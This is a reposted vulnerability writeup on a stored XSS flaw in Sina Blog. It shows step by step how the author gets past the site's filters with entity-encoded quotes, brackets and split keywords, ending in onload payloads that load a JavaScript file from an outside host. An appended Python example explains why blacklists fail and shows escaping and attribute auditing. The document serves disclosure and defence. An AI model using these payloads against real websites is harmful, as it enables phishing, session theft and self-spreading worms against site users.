Sina Blog stored XSS vulnerability can load arbitrary external js files

Source: Internet
Author: User

A stored XSS was found in Sina Blog; after the filter restrictions were bypassed, any external js file can be inserted.

Phishing, worms and so on can then be carried out directly.
Here is an analysis of the whole process of finding and exploiting this vulnerability.
 
 
1. I saw that many stored XSS posts on wooyun start from images, videos and the like, so I went to the Sina Blog homepage and posted an image as a test.
 
The original post data, as captured:

<A id=up_img_58081338895761039 href="http://album.sina.com.cn/pic/6f81831bhc1b7f66073a7&amp;690" target=_blank></A><BR>966
 
 
2. As when testing other websites for XSS, I appended the special characters '"></\ to the src address in the IMG tag to see whether they are filtered, i.e.

src="xxxx'"></\"

As expected, the " was filtered out.
 
 
3. Since " is filtered, is &quot; filtered as well?

I changed the post address to the following form:

src="xxxx&quot; onload=&quot;alert(1)&quot;"

After submitting and refreshing, 1 popped up, meaning alert(1) was executed. I was very happy at that point, because it shows there is a stored XSS and that neither onload nor &quot; is filtered.
 
 
4. The next idea is to insert an external js file, as everyone does.

Looking at the homepage source, I found that the third script tag is in src form, so I wrote the following post data:

src="xxxx&quot; onload=&quot;document.getElementsByTagName('script')[2].src='http://px1624.sinaapp.com/pxren.js'&quot;"

The call did not succeed and the image was not displayed. Viewing the source with F12 showed no data related to my post at all.
 
 
5. After thinking about it, Sina probably filters single quotes, so I replaced every single quote with &#39;

It was still unsuccessful. After some more testing I found that [ ] is filtered too, so I replaced [ and ] with &#x5B; and &#x5D;

This gives the following post data:

src="xxxx&quot; onload=&quot;document.getElementsByTagName(&#39;script&#39;)&#x5B;2&#x5D;.src=&#39;http://px1624.sinaapp.com/pxrenren.js&#39;&quot;"
 
 
6. It still failed. It really is Sina: there are a lot of restrictions, and even after finding the XSS point, inserting an external js file is difficult.

Then I wondered whether keywords such as document or getElementsByTagName were being filtered.

So I tried alert(document.cookie), and it popped up; so it must be getElementsByTagName that is filtered.

But getElementsByTagName is exactly what is needed to modify the src of the script tag. What now?
 
7. I tried String.fromCharCode() to express getElementsByTagName as character codes and bypass the filter that way. That still did not work.

Finally I thought of string splitting: take getElementsByTagName apart and write it so that the restriction is bypassed. The method is:

document.getElementsByTagName ------> document['get'+'ElementsByTagName']

The post data becomes:

src="xxxx&quot; onload=&quot;document&#x5B;&#39;get&#39;+&#39;ElementsByTagName&#39;&#x5D;(&#39;script&#39;)&#x5B;2&#x5D;.src=&#39;http://px1624.sinaapp.com/pxrenren.js&#39;&quot;"
 
 
Result (screenshot omitted): the external js is finally loaded successfully.
 
 
8. But it is not finished yet, because the getElementsByTagName approach above only works in IE; in a non-IE browser it does nothing.

So I need code that works in every browser.

Next, testing in Google Chrome.

What I thought of:

var s = document.createElement("script");
s.src = "JS address";
document.body.appendChild(s);
 
 
9. Sure enough, Sina also filters keywords such as createElement and appendChild.

The bypass is the same as above: split the strings and write them out.

The code is:

&quot; onload=&quot;var&#32;s=document&#x5B;&#39;creat&#39;+&#39;eElement&#39;&#x5D;(&#39;script&#39;);s.src=&#39; values (s)&quot;

Result:

In var&#32;s=, the &#32; is automatically changed to %20 after submission.

So I tried a tab, which is close to a space:

var&#09;s= but after submission the &#09; is likewise changed to %09.
 
 
10. Damn. It seems only one trick is left: use properties of window to get past it!

Replacing var s and s in the code above with window.s, the post code becomes:

&quot; onload=&quot;window.s=document&#x5B;&#39;creat&#39;+&#39;eElement&#39;&#x5D;(&#39;script&#39;);window.s.src=&#39; trim (window.s)&quot;

Tested: finally OK, it works in every browser!

Firefox and Chrome (screenshots omitted):
 
The following figure (omitted) shows the code in Charles and in F12.

The circled part is the constructed code I inserted into the post data.

It shows that my external js file is called successfully.
 
 
When I tested Renren last time,

onload="document.getElementsByTagName('script')[2].src='http://px1624.sinaapp.com/pxren.js'"

worked fine. I did not expect Sina to filter and restrict so much here; the security is not on the same level.
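To show why the two bypasses in this writeup work (entity references defeating a raw-character blacklist in step 3, string splitting defeating a keyword blacklist in steps 7 and 9) and what a sound check looks like instead, here is an added Python example; it is not code from the original post or from Sina. The blacklist tokens, the sample src values and the two rendering functions are assumptions reconstructed from the steps above, and the unsafe renderer models what the successful alert(1) implies: the server decodes entities before writing the value back into the tag.

```python
import html
from html.parser import HTMLParser

# Tokens the writeup reports being filtered, reconstructed as an assumed blacklist.
BANNED_CHARS = ('"', "'", "[", "]")
BANNED_WORDS = ("getElementsByTagName", "createElement", "appendChild")

# Constructed src values mirroring the writeup's steps (not captured traffic).
SAMPLES = {
    "benign": "http://example.invalid/a.jpg",
    "raw":    'xxxx" onload="alert(1)"',
    "entity": "xxxx&quot; onload=&quot;alert(1)&quot;",
    "split":  ("xxxx&quot; onload=&quot;window.s=document&#x5B;&#39;creat&#39;"
               "+&#39;eElement&#39;&#x5D;(&#39;script&#39;)&quot;"),
}

def raw_blacklist_accepts(value: str) -> bool:
    """Blacklist on the text as submitted: entity references contain none of the
    banned characters, so the encoded payloads pass (the step-3 bypass)."""
    return not any(tok in value for tok in BANNED_CHARS + BANNED_WORDS)

def word_blacklist_accepts(value: str) -> bool:
    """Keyword blacklist on the decoded text: 'creat'+'eElement' never contains
    createElement, so string splitting passes (the step-7/9 bypass)."""
    decoded = html.unescape(value)
    return not any(word in decoded for word in BANNED_WORDS)

def render_unsafely(value: str) -> str:
    """Assumed server behaviour: decode entities, then write the result straight
    into the attribute, so a decoded &quot; closes the src value."""
    return '<IMG src="%s">' % html.unescape(value)

def render_safely(value: str) -> str:
    """Decode once, then escape for the attribute context; a quote can no longer
    close the attribute, whatever keywords the value avoids."""
    return '<IMG src="%s">' % html.escape(html.unescape(value), quote=True)

class EventAttrAuditor(HTMLParser):
    """Sees attributes after entity decoding, i.e. as the browser will; any on*
    attribute means script runs regardless of how the value was spelled."""
    def __init__(self):
        super().__init__()
        self.findings = []
    def handle_starttag(self, tag, attrs):
        self.findings += [(tag, n, v) for n, v in attrs if n.startswith("on")]

def audit(markup: str) -> list:
    """Return (tag, attribute, value) for every event-handler attribute in markup."""
    p = EventAttrAuditor()
    p.feed(markup)
    p.close()
    return p.findings
```

The structural check in audit() catches both payloads after unsafe rendering and reports nothing after render_safely(), which is the property a filter should be judged on rather than which keywords it bans.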
 
 
After a long effort, I finally managed to load arbitrary external JavaScript.

Finally, I would like to thank gainover for the tips and help during the breakthrough. Thank you for reading and analyzing carefully!
 
Author px1624
